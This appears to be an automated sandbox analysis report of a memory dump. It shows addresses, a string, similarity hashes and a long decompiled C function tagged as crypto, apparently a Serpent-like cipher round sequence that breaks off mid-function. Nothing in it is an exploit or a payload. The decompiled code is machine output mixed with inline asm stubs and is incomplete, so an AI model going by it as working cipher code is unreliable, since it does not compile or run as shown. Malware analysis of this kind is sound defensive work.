0x00758ee4
0x00758ee6
0x00758eef
0x00758ef9
0x00758efe
0x00758f01
0x00758f09
0x00758f13
0x00758f1b
0x00758f1f
0x00758f22
0x00758f24
0x00758f27
0x00758f2d
0x00758f30
0x00758f32
0x00758f3a
0x00758f42
0x00758f45
0x00758f4b
0x00758f59
0x00758f5d
0x00758f63
0x00758f75
0x00758f77
0x00758f79
0x00758f7f
0x00758f85
0x00758f8b
0x00758f91
0x00758f97
0x00758f9d
0x00758fa0
0x00758fa4
0x00758fa7
0x00758faa
0x00758faf

Strings

:Uu, xrefs: 00757DEC

Memory Dump Source

Source File: 00000000.00000002.638931925.0000000000751000.00000020.00020000.sdmp, Offset: 00750000, based on PE: true

Associated: 00000000.00000002.638878437.0000000000750000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.639187632.000000000075C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.639241972.000000000075D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.639332156.000000000075F000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID: :Uu
API String ID: 0-824088054
Opcode ID: 0d7d61c58bdfb79ee78f08d3b0b3506fda8a4388aaac689fb9ecbf82b366e6c3
Instruction ID: aa1f3de3ee713c1133f33fe3eafd87669d4d7b56d9a9f69246da324f542e951f
Opcode Fuzzy Hash: 0d7d61c58bdfb79ee78f08d3b0b3506fda8a4388aaac689fb9ecbf82b366e6c3
Instruction Fuzzy Hash: CBD20D73E042289FDB48CFA6C4955AFF3B3BFC8210F57C1BE8915B7255CA7029068A84

Uniqueness

Uniqueness Score: -1.00%

Function 0075954A, Relevance: 2.9, Strings: 1, Instructions: 1669
COMMONCrypto

Download Yara Rule

C-Code - Quality: 66%

			E0075954A(void* __eax, signed int* __edx, signed int* _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int* _t544;
				signed int _t545;
				signed int _t546;
				signed int _t555;
				signed int _t557;
				signed int _t563;
				signed int _t566;
				signed int _t576;
				signed int _t580;
				signed int _t582;
				signed int _t588;
				signed int _t592;
				signed int _t595;
				signed int _t596;
				signed int _t606;
				signed int _t608;
				signed int _t614;
				signed int _t617;
				signed int _t627;
				signed int _t631;
				signed int _t633;
				signed int _t639;
				signed int _t643;
				signed int _t646;
				signed int _t647;
				signed int _t657;
				signed int _t659;
				signed int _t665;
				signed int _t668;
				signed int _t678;
				signed int _t682;
				signed int _t684;
				signed int _t690;
				signed int _t694;
				signed int _t697;
				signed int _t698;
				signed int _t708;
				signed int _t710;
				signed int _t716;
				signed int _t719;
				signed int _t729;
				signed int _t733;
				signed int _t735;
				signed int _t736;
				signed int _t738;
				signed int _t742;
				signed int _t749;
				signed int _t752;
				signed int _t754;
				signed int _t755;
				signed int _t758;
				signed int _t764;
				signed int _t765;
				signed int _t769;
				signed int _t772;
				signed int _t779;
				signed int _t785;
				signed int _t787;
				signed int _t790;
				signed int _t795;
				signed int _t804;
				signed int _t807;
				signed int _t813;
				signed int _t814;
				signed int _t817;
				signed int _t825;
				signed int _t828;
				signed int _t829;
				signed int _t831;
				signed int _t836;
				signed int _t837;
				signed int _t841;
				signed int _t844;
				signed int _t851;
				signed int _t857;
				signed int _t859;
				signed int _t862;
				signed int _t867;
				signed int _t876;
				signed int _t879;
				signed int _t885;
				signed int _t886;
				signed int _t889;
				signed int _t897;
				signed int _t900;
				signed int _t901;
				signed int _t903;
				signed int _t908;
				signed int _t909;
				signed int _t913;
				signed int _t916;
				signed int _t923;
				signed int _t929;
				signed int _t931;
				signed int _t934;
				signed int _t939;
				signed int _t948;
				signed int _t951;
				signed int _t957;
				signed int _t958;
				signed int _t961;
				signed int _t969;
				signed int _t972;
				signed int _t973;
				signed int _t975;
				signed int _t980;
				signed int _t981;
				signed int _t985;
				signed int _t988;
				signed int _t995;
				signed int _t1001;
				signed int _t1003;
				signed int _t1006;
				signed int _t1011;
				signed int _t1020;
				signed int _t1023;
				signed int _t1029;
				signed int _t1030;
				signed int _t1033;
				signed int _t1036;
				signed int _t1045;
				signed int _t1057;
				signed int _t1058;
				signed int _t1065;
				signed int _t1066;
				signed int _t1068;
				signed int _t1070;
				signed int _t1079;
				signed int _t1080;
				signed int _t1085;
				signed int _t1087;
				signed int _t1089;
				signed int _t1091;
				signed int _t1097;
				signed int _t1100;
				signed int _t1105;
				signed int _t1106;
				signed int _t1108;
				signed int _t1111;
				signed int _t1113;
				signed int _t1115;
				signed int _t1116;
				signed int _t1121;
				signed int _t1125;
				signed int _t1132;
				signed int _t1133;
				signed int _t1135;
				signed int _t1137;
				signed int _t1146;
				signed int _t1147;
				signed int _t1152;
				signed int _t1154;
				signed int _t1156;
				signed int _t1158;
				signed int _t1164;
				signed int _t1167;
				signed int _t1172;
				signed int _t1173;
				signed int _t1175;
				signed int _t1178;
				signed int _t1180;
				signed int _t1182;
				signed int _t1183;
				signed int _t1188;
				signed int _t1192;
				signed int _t1199;
				signed int _t1200;
				signed int _t1202;
				signed int _t1204;
				signed int _t1213;
				signed int _t1214;
				signed int _t1219;
				signed int _t1221;
				signed int _t1223;
				signed int _t1225;
				signed int _t1231;
				signed int _t1234;
				signed int _t1239;
				signed int _t1240;
				signed int _t1242;
				signed int _t1245;
				signed int _t1247;
				signed int _t1249;
				signed int _t1250;
				signed int _t1255;
				signed int _t1259;
				signed int _t1266;
				signed int _t1267;
				signed int _t1269;
				signed int _t1271;
				signed int _t1280;
				signed int _t1281;
				signed int _t1286;
				signed int _t1288;
				signed int _t1290;
				signed int _t1292;
				signed int _t1298;
				signed int _t1301;
				signed int _t1306;
				signed int _t1307;
				signed int _t1309;
				signed int _t1312;
				signed int _t1314;
				signed int _t1316;
				signed int _t1323;
				signed int _t1324;
				signed int _t1328;
				signed int _t1334;
				signed int _t1338;
				signed int _t1340;
				signed int _t1343;
				signed int _t1347;
				signed int _t1355;
				signed int _t1357;
				signed int _t1361;
				signed int _t1364;
				signed int _t1369;
				signed int _t1373;
				signed int _t1384;
				signed int _t1393;
				signed int _t1394;
				signed int _t1396;
				signed int _t1400;
				signed int _t1404;
				signed int _t1406;
				signed int _t1409;
				signed int _t1413;
				signed int _t1421;
				signed int _t1423;
				signed int _t1427;
				signed int _t1430;
				signed int _t1435;
				signed int _t1439;
				signed int _t1450;
				signed int _t1459;
				signed int _t1460;
				signed int _t1462;
				signed int _t1466;
				signed int _t1470;
				signed int _t1472;
				signed int _t1475;
				signed int _t1479;
				signed int _t1487;
				signed int _t1489;
				signed int _t1493;
				signed int _t1496;
				signed int _t1501;
				signed int _t1505;
				signed int _t1516;
				signed int _t1525;
				signed int _t1526;
				signed int _t1528;
				signed int _t1532;
				signed int _t1536;
				signed int _t1538;
				signed int _t1541;
				signed int _t1545;
				signed int _t1553;
				signed int _t1555;
				signed int _t1559;
				signed int _t1562;
				signed int _t1568;
				signed int _t1572;
				signed int _t1579;
				signed int _t1580;
				signed int _t1586;
				signed int _t1589;
				signed int _t1591;
				signed int _t1596;
				signed int _t1597;
				signed int _t1599;
				signed int _t1600;
				signed int _t1603;
				signed int _t1608;
				signed int _t1609;
				signed int _t1613;
				signed int _t1616;
				signed int _t1622;
				signed int _t1623;
				signed int _t1629;
				signed int _t1631;
				signed int _t1633;
				signed int _t1634;
				signed int _t1636;
				signed int _t1639;
				signed int _t1652;
				signed int _t1658;
				signed int _t1661;
				signed int _t1663;
				signed int _t1668;
				signed int _t1669;
				signed int _t1671;
				signed int _t1672;
				signed int _t1675;
				signed int _t1680;
				signed int _t1681;
				signed int _t1685;
				signed int _t1688;
				signed int _t1694;
				signed int _t1695;
				signed int _t1701;
				signed int _t1703;
				signed int _t1705;
				signed int _t1706;
				signed int _t1708;
				signed int _t1711;
				signed int _t1724;
				signed int _t1730;
				signed int _t1733;
				signed int _t1735;
				signed int _t1740;
				signed int _t1741;
				signed int _t1743;
				signed int _t1744;
				signed int _t1747;
				signed int _t1752;
				signed int _t1753;
				signed int _t1757;
				signed int _t1760;
				signed int _t1766;
				signed int _t1767;
				signed int _t1773;
				signed int _t1775;
				signed int _t1777;
				signed int _t1778;
				signed int _t1780;
				signed int _t1783;
				signed int _t1796;
				signed int _t1802;
				signed int _t1805;
				signed int _t1807;
				signed int _t1812;
				signed int _t1813;
				signed int _t1815;
				signed int _t1816;
				signed int _t1819;
				signed int _t1824;
				signed int _t1825;
				signed int _t1829;
				signed int _t1832;
				signed int _t1838;
				signed int _t1839;
				signed int _t1848;
				signed int _t1849;
				signed int _t1851;
				signed int _t1852;
				signed int _t1854;
				signed int _t1857;
				signed int* _t1861;

				_t754 = __edx[2];
				_t545 = __edx[3];
				_t1579 =  *__edx;
				_t1323 = __edx[1];
				_v40 = _t754;
				_t755 = _t754 ^  *(__eax + 0x228);
				_v48 = _t1579;
				_t1580 = _t1579 ^  *(__eax + 0x220);
				_v44 = _t1323;
				_t1324 = _t1323 ^  *(__eax + 0x224);
				_v12 = _t755;
				_v36 = _t545;
				_t546 = _t545 ^  *(__eax + 0x22c);
				_t758 = (_t1324 | _t1580) & _t546;
				_v8 = _t1324 & _t1580 | _t755;
				_t1057 = _t758 ^ _v8;
				_v16 = _t758 ^ _t1324;
				_t764 = ( !_t546 ^ _t1057 | _v16) ^ _t1580;
				_t1328 = (_t764 | _t546) ^ _v16 ^ _v12;
				_t1058 = _t1057 ^  *(__eax + 0x21c);
				_t765 = _t764 ^  *(__eax + 0x214);
				_v16 = _t1057 & _t1580 ^ _t1328 ^ _t764 ^ _v8;
				asm("ror ebx, 0x16");
				_t555 =  *(__eax + 0x218) ^ _v16 ^ _t765 << 0x00000007 ^ _t1058;
				asm("ror esi, 0x5");
				_t1586 =  *(__eax + 0x210) ^ _t1328 ^ _t765 ^ _t1058;
				asm("ror edx, 0x7");
				asm("ror ecx, 1");
				_v12 = _t1058 ^ _t1586 << 0x00000003 ^ _t555;
				asm("ror ebx, 0x3");
				asm("ror esi, 0xd");
				_v16 = _t765 ^ _t555 ^ _t1586;
				_t1065 = ( !_t555 | _t1586) ^ _v16 ^ _v12;
				_t769 = _t555 ^ _t1586;
				_t1589 = (_t1586 | _v16) ^ _t1065 | _t769 & _v16;
				_t1334 = _t1589 ^ _t555;
				_t1066 = _t1065 ^  *(__eax + 0x204);
				_t557 =  !_t1065;
				_t772 = (_t769 | _v12) ^ _t557 ^ _t1589;
				_t1591 = _t772 ^  *(__eax + 0x20c);
				_v12 = _t772 & _t1334;
				asm("ror ecx, 0x16");
				_t779 =  *(__eax + 0x208) ^ _v12 ^ _t557 ^ _v16 ^ _t1066 << 0x00000007 ^ _t1591;
				asm("ror ebx, 0x5");
				_t563 =  *(__eax + 0x200) ^ _t1334 ^ _t1591 ^ _t1066;
				asm("ror esi, 0x7");
				asm("ror edx, 1");
				_t1068 = _t1066 ^ _t779 ^ _t563;
				asm("ror ecx, 0x3");
				_v8 = _t1591 ^ _t563 << 0x00000003 ^ _t779;
				_t1338 =  !_t779;
				_t1596 = _t1338 & _t1068 ^ _v8;
				asm("ror ebx, 0xd");
				_v20 = _t1596;
				_t1597 = _t1596 & _t563;
				_v24 = _t1597;
				_t1599 = _t1597 ^ _t1338 ^ _t1068;
				_v16 = _t1068;
				_v32 = _t1338;
				_t1600 = _t1599 ^  *(__eax + 0x1fc);
				_t1340 = _t1599 | _t1068;
				_t1070 = _v8 | _t563;
				_v12 = _t1070;
				_v28 = _t1340;
				_t1343 = _t1340 & _t563 ^  *(__eax + 0x1f4) ^ _v20;
				asm("ror ecx, 0x16");
				_t785 = (_t779 ^ _t563 | _v24) ^ _t1070 & _v16 ^  *(__eax + 0x1f8) ^ _t1343 << 0x00000007 ^ _t1600;
				asm("ror edx, 0x5");
				_t1079 =  *(__eax + 0x1f0) ^ _v12 ^ _v28 ^ _v32 ^ _t1343 ^ _t1600;
				asm("ror esi, 0x7");
				_t566 = _t1600 ^ _t1079 << 0x00000003 ^ _t785;
				asm("ror edi, 1");
				asm("ror ecx, 0x3");
				_v16 = _t785;
				asm("ror edx, 0xd");
				_t1603 = _t1343 ^ _t785 ^ _t1079;
				_t787 = (_t785 | _t566) ^ _t1603;
				_v8 = _t1603 | _t566;
				_v12 = _t566;
				_t1608 = (_t1079 ^ _t566) & _v8 ^ _t787;
				_t1347 = _t787 & _t1079;
				_t1080 =  !_t1079;
				_t1609 = _t1608 ^  *(__eax + 0x1ec);
				_v32 = _t1080 | _t1608;
				_t1085 =  *(__eax + 0x1e4) ^ _t1347 ^ _v16 ^ _v12;
				_v28 = _v16 ^ _t1608 | _t1080;
				asm("ror edi, 0x16");
				asm("ror ebx, 0x5");
				_t576 =  *(__eax + 0x1e0) ^ _v28 ^ _t787 ^ _t1609 ^ _t1085;
				asm("ror esi, 0x7");
				_t790 = (_t1347 | _v16) ^  *(__eax + 0x1e8) ^ _v32 ^ _v8 ^ _t1085 << 0x00000007 ^ _t1609;
				asm("ror edx, 1");
				_t1087 = _t1085 ^ _t790 ^ _t576;
				asm("ror ecx, 0x3");
				_t1355 = _t790 | _t1087;
				_v8 = _t1609 ^ _t576 << 0x00000003 ^ _t790;
				_t1613 = _t790 ^ _t1087;
				asm("ror ebx, 0xd");
				_v12 = _t1355;
				_t1357 = _t1355 ^ _t790 ^ _t576;
				_t1089 = _t1357 | _v8;
				_v16 = _t1089 ^ _t1613;
				_t795 = _v12 ^ _v8 ^ _t576;
				_t1091 = (_t1089 | _t1613) ^ _t795;
				_t1616 = (_t795 | _v16) ^ _t1357 & _t576 ^  *(__eax + 0x1d4);
				_t804 = (_t1091 & _t576 ^ _v12) & _v16 ^  *(__eax + 0x1dc) ^ _t1357;
				asm("ror edi, 0x16");
				_t1361 =  *(__eax + 0x1d8) ^ _t1091 ^ _t1616 << 0x00000007 ^ _t804;
				asm("ror edx, 0x5");
				_t1097 =  *(__eax + 0x1d0) ^ _v16 ^ _t1616 ^ _t804;
				asm("ror ecx, 0x7");
				asm("ror esi, 1");
				_v12 = _t804 ^ _t1097 << 0x00000003 ^ _t1361;
				_t807 = _t1616 ^ _t1361 ^ _t1097;
				asm("ror edi, 0x3");
				asm("ror edx, 0xd");
				_t580 = _t807 ^ _v12;
				_v16 = _t1361 ^ _t1097;
				_t1622 = _t580 ^ _t1361;
				_t1364 = _t1622 & _t807 ^ _v16;
				_t1623 =  !_t1622;
				_t813 = (( !_t580 | _t1097) ^ _v12 | _v16) ^ _t580;
				_t814 = _t813 ^  *(__eax + 0x1cc);
				_t582 = _t813 | _t1364;
				_t1100 =  *(__eax + 0x1c4) ^ _t582 ^ _t1623;
				asm("ror esi, 0x16");
				_t1629 = _t1623 & _v12 ^  *(__eax + 0x1c8) ^ _t582 ^ _v16 ^ _t1100 << 0x00000007 ^ _t814;
				asm("ror ebx, 0x5");
				_t588 =  *(__eax + 0x1c0) ^ _t1364 ^ _t814 ^ _t1100;
				asm("ror ecx, 0x7");
				asm("ror edx, 1");
				asm("ror esi, 0x3");
				_v8 = _t814 ^ _t588 << 0x00000003 ^ _t1629;
				_v12 = _t1629;
				asm("ror ebx, 0xd");
				_t817 = _t1100 ^ _t1629 ^ _t588;
				_t1631 = _v8 ^ _t588;
				_t1369 = _v12 ^ _t817 ^ _t588;
				_t1105 = (_v8 | _t817) ^ _t1369;
				_v32 = _t1369;
				_v28 = _t1631;
				_t1373 = ((_t1631 | _v12) ^ _t817) & _v32;
				_v32 = _t1373;
				_t1633 = _t1373 ^ _v28;
				_t1634 = _t1633 ^  *(__eax + 0x1b4);
				_t1106 = _t1105 ^  *(__eax + 0x1bc);
				_v16 =  !(_t817 & _t588) ^ _v32;
				asm("ror ecx, 0x16");
				_t825 =  *(__eax + 0x1b8) ^ _v16 ^ _t1633 & _t1105 ^ _t1634 << 0x00000007 ^ _t1106;
				asm("ror edi, 0x5");
				_t1384 = _v8 & _t588 ^  *(__eax + 0x1b0) ^ _v16 ^ _v12 ^ _t1634 ^ _t1106;
				asm("ror edx, 0x7");
				_t1108 = _t1106 ^ _t1384 << 0x00000003 ^ _t825;
				asm("ror esi, 1");
				_t1636 = _t1634 ^ _t825 ^ _t1384;
				asm("ror ecx, 0x3");
				_v12 = _t1108;
				asm("ror edi, 0xd");
				_t592 = _t825 ^ _t1108;
				_v16 = _t1636;
				_t1111 = _t1384 ^ _t1636 ^ _v12;
				_t1639 = (_t1111 | _t825) ^ _t1384;
				_t828 = _t1639 & _t592 ^ _t1111;
				_t1113 = _v16 & _v12;
				_v28 = _t1113;
				_t1115 = (_t1113 | _t828) ^  !_t1639;
				_t1116 = _t1115 ^  *(__eax + 0x1ac);
				_t829 = _t828 ^  *(__eax + 0x1a4);
				_v32 = _t1115 | _t828;
				asm("ror edi, 0x16");
				_v12 = (_t1384 | _v16) ^  *(__eax + 0x1a8) ^  !_t592 ^ _t829 << 0x00000007 ^ _t1116;
				asm("ror esi, 0x5");
				_t1652 =  *(__eax + 0x1a0) ^ _v32 ^ _v28 ^ _t592 ^ _t1116 ^ _t829;
				asm("ror edx, 0x7");
				asm("ror ecx, 1");
				_v8 = _t1116 ^ _t1652 << 0x00000003 ^ _v12;
				_t831 = _t829 ^ _v12 ^ _t1652;
				asm("ror dword [ebp-0x8], 0x3");
				asm("ror esi, 0xd");
				_t595 = (_t831 | _t1652) & _v8;
				_t1121 = _t831 & _t1652 | _v12;
				_t596 = _t595 ^ _t831;
				_t1393 = _t595 ^ _t1121;
				_t836 = ( !_v8 ^ _t1393 | _t596) ^ _t1652;
				_v28 = _t1121;
				_t1125 = (_t836 | _v8) ^ _t596 ^ _v12;
				_t837 = _t836 ^  *(__eax + 0x194);
				_v28 = _v28 ^ _t836;
				_t1394 = _t1393 ^  *(__eax + 0x19c);
				_v32 = _t1393 & _t1652 ^ _t1125;
				asm("ror ebx, 0x16");
				_t606 =  *(__eax + 0x198) ^ _v32 ^ _v28 ^ _t837 << 0x00000007 ^ _t1394;
				asm("ror esi, 0x5");
				_t1658 =  *(__eax + 0x190) ^ _t1125 ^ _t837 ^ _t1394;
				asm("ror edi, 0x7");
				_t1396 = _t1394 ^ _t1658 << 0x00000003 ^ _t606;
				asm("ror ecx, 1");
				asm("ror ebx, 0x3");
				asm("ror esi, 0xd");
				_v16 = _t837 ^ _t606 ^ _t1658;
				_t841 = _t606 ^ _t1658;
				_v12 = _t1396;
				_t1132 = ( !_t606 | _t1658) ^ _v16 ^ _t1396;
				_t1661 = (_t1658 | _v16) ^ _t1132 | _t841 & _v16;
				_t1400 = _t1661 ^ _t606;
				_t1133 = _t1132 ^  *(__eax + 0x184);
				_t608 =  !_t1132;
				_t844 = (_t841 | _v12) ^ _t608 ^ _t1661;
				_t1663 = _t844 ^  *(__eax + 0x18c);
				_v32 = _t844 & _t1400;
				asm("ror ecx, 0x16");
				_t851 =  *(__eax + 0x188) ^ _v32 ^ _t608 ^ _v16 ^ _t1133 << 0x00000007 ^ _t1663;
				asm("ror ebx, 0x5");
				_t614 =  *(__eax + 0x180) ^ _t1400 ^ _t1663 ^ _t1133;
				asm("ror esi, 0x7");
				asm("ror edx, 1");
				_t1135 = _t1133 ^ _t851 ^ _t614;
				asm("ror ecx, 0x3");
				_t1404 =  !_t851;
				_v8 = _t1663 ^ _t614 << 0x00000003 ^ _t851;
				_t1668 = _t1404 & _t1135 ^ _v8;
				asm("ror ebx, 0xd");
				_v32 = _t1668;
				_t1669 = _t1668 & _t614;
				_v16 = _t1135;
				_v28 = _t1669;
				_t1671 = _t1669 ^ _t1404 ^ _t1135;
				_v20 = _t1404;
				_t1672 = _t1671 ^  *(__eax + 0x17c);
				_t1406 = _t1671 | _t1135;
				_t1137 = _v8 | _t614;
				_v12 = _t1137;
				_v24 = _t1406;
				_t1409 = _t1406 & _t614 ^  *(__eax + 0x174) ^ _v32;
				asm("ror ecx, 0x16");
				_t857 = (_t851 ^ _t614 | _v28) ^ _t1137 & _v16 ^  *(__eax + 0x178) ^ _t1409 << 0x00000007 ^ _t1672;
				asm("ror edx, 0x5");
				_t1146 =  *(__eax + 0x170) ^ _v12 ^ _v24 ^ _v20 ^ _t1409 ^ _t1672;
				asm("ror esi, 0x7");
				asm("ror edi, 1");
				asm("ror ecx, 0x3");
				_t617 = _t1672 ^ _t1146 << 0x00000003 ^ _t857;
				_v16 = _t857;
				asm("ror edx, 0xd");
				_t1675 = _t1409 ^ _t857 ^ _t1146;
				_t859 = (_t857 | _t617) ^ _t1675;
				_v8 = _t1675 | _t617;
				_v12 = _t617;
				_t1680 = (_t1146 ^ _t617) & _v8 ^ _t859;
				_t1413 = _t859 & _t1146;
				_t1147 =  !_t1146;
				_t1681 = _t1680 ^  *(__eax + 0x16c);
				_v32 = _t1147 | _t1680;
				_t1152 =  *(__eax + 0x164) ^ _t1413 ^ _v16 ^ _v12;
				_v28 = _v16 ^ _t1680 | _t1147;
				asm("ror edi, 0x16");
				asm("ror ebx, 0x5");
				_t627 =  *(__eax + 0x160) ^ _v28 ^ _t859 ^ _t1681 ^ _t1152;
				asm("ror esi, 0x7");
				_t862 = (_t1413 | _v16) ^  *(__eax + 0x168) ^ _v32 ^ _v8 ^ _t1152 << 0x00000007 ^ _t1681;
				asm("ror edx, 1");
				_t1154 = _t1152 ^ _t862 ^ _t627;
				asm("ror ecx, 0x3");
				_t1421 = _t862 | _t1154;
				_v8 = _t1681 ^ _t627 << 0x00000003 ^ _t862;
				_v12 = _t1421;
				asm("ror ebx, 0xd");
				_t1685 = _t862 ^ _t1154;
				_t1423 = _t1421 ^ _t862 ^ _t627;
				_t1156 = _t1423 | _v8;
				_v16 = _t1156 ^ _t1685;
				_t867 = _v12 ^ _v8 ^ _t627;
				_t1158 = (_t1156 | _t1685) ^ _t867;
				_t1688 = (_t867 | _v16) ^ _t1423 & _t627 ^  *(__eax + 0x154);
				_t876 = (_t1158 & _t627 ^ _v12) & _v16 ^  *(__eax + 0x15c) ^ _t1423;
				asm("ror edi, 0x16");
				_t1427 =  *(__eax + 0x158) ^ _t1158 ^ _t1688 << 0x00000007 ^ _t876;
				asm("ror edx, 0x5");
				_t1164 =  *(__eax + 0x150) ^ _v16 ^ _t1688 ^ _t876;
				asm("ror ecx, 0x7");
				asm("ror esi, 1");
				_v12 = _t876 ^ _t1164 << 0x00000003 ^ _t1427;
				_t879 = _t1688 ^ _t1427 ^ _t1164;
				asm("ror edi, 0x3");
				asm("ror edx, 0xd");
				_t631 = _t879 ^ _v12;
				_v16 = _t1427 ^ _t1164;
				_t1694 = _t631 ^ _t1427;
				_t1430 = _t1694 & _t879 ^ _v16;
				_t1695 =  !_t1694;
				_t885 = (( !_t631 | _t1164) ^ _v12 | _v16) ^ _t631;
				_t886 = _t885 ^  *(__eax + 0x14c);
				_t633 = _t885 | _t1430;
				_t1167 =  *(__eax + 0x144) ^ _t633 ^ _t1695;
				asm("ror esi, 0x16");
				_t1701 = _t1695 & _v12 ^  *(__eax + 0x148) ^ _t633 ^ _v16 ^ _t1167 << 0x00000007 ^ _t886;
				asm("ror ebx, 0x5");
				_t639 =  *(__eax + 0x140) ^ _t1430 ^ _t886 ^ _t1167;
				asm("ror ecx, 0x7");
				asm("ror edx, 1");
				_v8 = _t886 ^ _t639 << 0x00000003 ^ _t1701;
				asm("ror esi, 0x3");
				_v12 = _t1701;
				_t889 = _t1167 ^ _t1701 ^ _t639;
				asm("ror ebx, 0xd");
				_t1435 = _v12 ^ _t889 ^ _t639;
				_t1172 = (_v8 | _t889) ^ _t1435;
				_t1703 = _v8 ^ _t639;
				_v32 = _t1435;
				_v28 = _t1703;
				_t1439 = ((_t1703 | _v12) ^ _t889) & _v32;
				_v32 = _t1439;
				_t1705 = _t1439 ^ _v28;
				_t1706 = _t1705 ^  *(__eax + 0x134);
				_t1173 = _t1172 ^  *(__eax + 0x13c);
				_v16 =  !(_t889 & _t639) ^ _v32;
				asm("ror ecx, 0x16");
				_t897 =  *(__eax + 0x138) ^ _v16 ^ _t1705 & _t1172 ^ _t1706 << 0x00000007 ^ _t1173;
				asm("ror edi, 0x5");
				_t1450 = _v8 & _t639 ^  *(__eax + 0x130) ^ _v16 ^ _v12 ^ _t1706 ^ _t1173;
				asm("ror edx, 0x7");
				_t1175 = _t1173 ^ _t1450 << 0x00000003 ^ _t897;
				asm("ror esi, 1");
				_t1708 = _t1706 ^ _t897 ^ _t1450;
				asm("ror ecx, 0x3");
				_v12 = _t1175;
				_t643 = _t897 ^ _t1175;
				asm("ror edi, 0xd");
				_t1178 = _t1450 ^ _t1708 ^ _v12;
				_v16 = _t1708;
				_t1711 = (_t1178 | _t897) ^ _t1450;
				_t900 = _t1711 & _t643 ^ _t1178;
				_t1180 = _v16 & _v12;
				_v28 = _t1180;
				_t1182 = (_t1180 | _t900) ^  !_t1711;
				_t1183 = _t1182 ^  *(__eax + 0x12c);
				_t901 = _t900 ^  *(__eax + 0x124);
				_v32 = _t1182 | _t900;
				asm("ror edi, 0x16");
				_v12 = (_t1450 | _v16) ^  *(__eax + 0x128) ^  !_t643 ^ _t901 << 0x00000007 ^ _t1183;
				asm("ror esi, 0x5");
				_t1724 =  *(__eax + 0x120) ^ _v32 ^ _v28 ^ _t643 ^ _t1183 ^ _t901;
				asm("ror edx, 0x7");
				asm("ror ecx, 1");
				_v8 = _t1183 ^ _t1724 << 0x00000003 ^ _v12;
				_t903 = _t901 ^ _v12 ^ _t1724;
				asm("ror dword [ebp-0x8], 0x3");
				asm("ror esi, 0xd");
				_t646 = (_t903 | _t1724) & _v8;
				_t1188 = _t903 & _t1724 | _v12;
				_t647 = _t646 ^ _t903;
				_t1459 = _t646 ^ _t1188;
				_t908 = ( !_v8 ^ _t1459 | _t647) ^ _t1724;
				_v28 = _t1188;
				_t1192 = (_t908 | _v8) ^ _t647 ^ _v12;
				_t909 = _t908 ^  *(__eax + 0x114);
				_v28 = _v28 ^ _t908;
				_t1460 = _t1459 ^  *(__eax + 0x11c);
				_v32 = _t1459 & _t1724 ^ _t1192;
				asm("ror ebx, 0x16");
				_t657 =  *(__eax + 0x118) ^ _v32 ^ _v28 ^ _t909 << 0x00000007 ^ _t1460;
				asm("ror esi, 0x5");
				_t1730 =  *(__eax + 0x110) ^ _t1192 ^ _t909 ^ _t1460;
				asm("ror edi, 0x7");
				_t1462 = _t1460 ^ _t1730 << 0x00000003 ^ _t657;
				asm("ror ecx, 1");
				asm("ror ebx, 0x3");
				_v16 = _t909 ^ _t657 ^ _t1730;
				_v12 = _t1462;
				asm("ror esi, 0xd");
				_t913 = _t657 ^ _t1730;
				_t1199 = ( !_t657 | _t1730) ^ _v16 ^ _t1462;
				_t1733 = (_t1730 | _v16) ^ _t1199 | _t913 & _v16;
				_t1466 = _t1733 ^ _t657;
				_t1200 = _t1199 ^  *(__eax + 0x104);
				_t659 =  !_t1199;
				_t916 = (_t913 | _v12) ^ _t659 ^ _t1733;
				_t1735 = _t916 ^  *(__eax + 0x10c);
				_v32 = _t916 & _t1466;
				asm("ror ecx, 0x16");
				_t923 =  *(__eax + 0x108) ^ _v32 ^ _t659 ^ _v16 ^ _t1200 << 0x00000007 ^ _t1735;
				asm("ror ebx, 0x5");
				_t665 =  *(__eax + 0x100) ^ _t1466 ^ _t1735 ^ _t1200;
				asm("ror esi, 0x7");
				asm("ror edx, 1");
				_t1202 = _t1200 ^ _t923 ^ _t665;
				asm("ror ecx, 0x3");
				_t1470 =  !_t923;
				_v8 = _t1735 ^ _t665 << 0x00000003 ^ _t923;
				_t1740 = _t1470 & _t1202 ^ _v8;
				asm("ror ebx, 0xd");
				_v32 = _t1740;
				_t1741 = _t1740 & _t665;
				_v28 = _t1741;
				_t1743 = _t1741 ^ _t1470 ^ _t1202;
				_v20 = _t1470;
				_v16 = _t1202;
				_t1744 = _t1743 ^  *(__eax + 0xfc);
				_t1472 = _t1743 | _t1202;
				_t1204 = _v8 | _t665;
				_v24 = _t1472;
				_v12 = _t1204;
				_t1475 = _t1472 & _t665 ^  *(__eax + 0xf4) ^ _v32;
				asm("ror ecx, 0x16");
				_t929 = (_t923 ^ _t665 | _v28) ^ _t1204 & _v16 ^  *(__eax + 0xf8) ^ _t1475 << 0x00000007 ^ _t1744;
				asm("ror edx, 0x5");
				_t1213 =  *(__eax + 0xf0) ^ _v12 ^ _v24 ^ _v20 ^ _t1475 ^ _t1744;
				asm("ror esi, 0x7");
				asm("ror edi, 1");
				asm("ror ecx, 0x3");
				_t668 = _t1744 ^ _t1213 << 0x00000003 ^ _t929;
				_t1747 = _t1475 ^ _t929 ^ _t1213;
				asm("ror edx, 0xd");
				_v16 = _t929;
				_t931 = (_t929 | _t668) ^ _t1747;
				_v8 = _t1747 | _t668;
				_v12 = _t668;
				_t1752 = (_t1213 ^ _t668) & _v8 ^ _t931;
				_t1479 = _t931 & _t1213;
				_t1214 =  !_t1213;
				_t1753 = _t1752 ^  *(__eax + 0xec);
				_v32 = _t1214 | _t1752;
				_t1219 =  *(__eax + 0xe4) ^ _t1479 ^ _v16 ^ _v12;
				_v28 = _v16 ^ _t1752 | _t1214;
				asm("ror edi, 0x16");
				asm("ror ebx, 0x5");
				_t678 =  *(__eax + 0xe0) ^ _v28 ^ _t931 ^ _t1753 ^ _t1219;
				asm("ror esi, 0x7");
				_t934 = (_t1479 | _v16) ^  *(__eax + 0xe8) ^ _v32 ^ _v8 ^ _t1219 << 0x00000007 ^ _t1753;
				asm("ror edx, 1");
				_t1221 = _t1219 ^ _t934 ^ _t678;
				asm("ror ecx, 0x3");
				_t1487 = _t934 | _t1221;
				_v8 = _t1753 ^ _t678 << 0x00000003 ^ _t934;
				_v12 = _t1487;
				asm("ror ebx, 0xd");
				_t1757 = _t934 ^ _t1221;
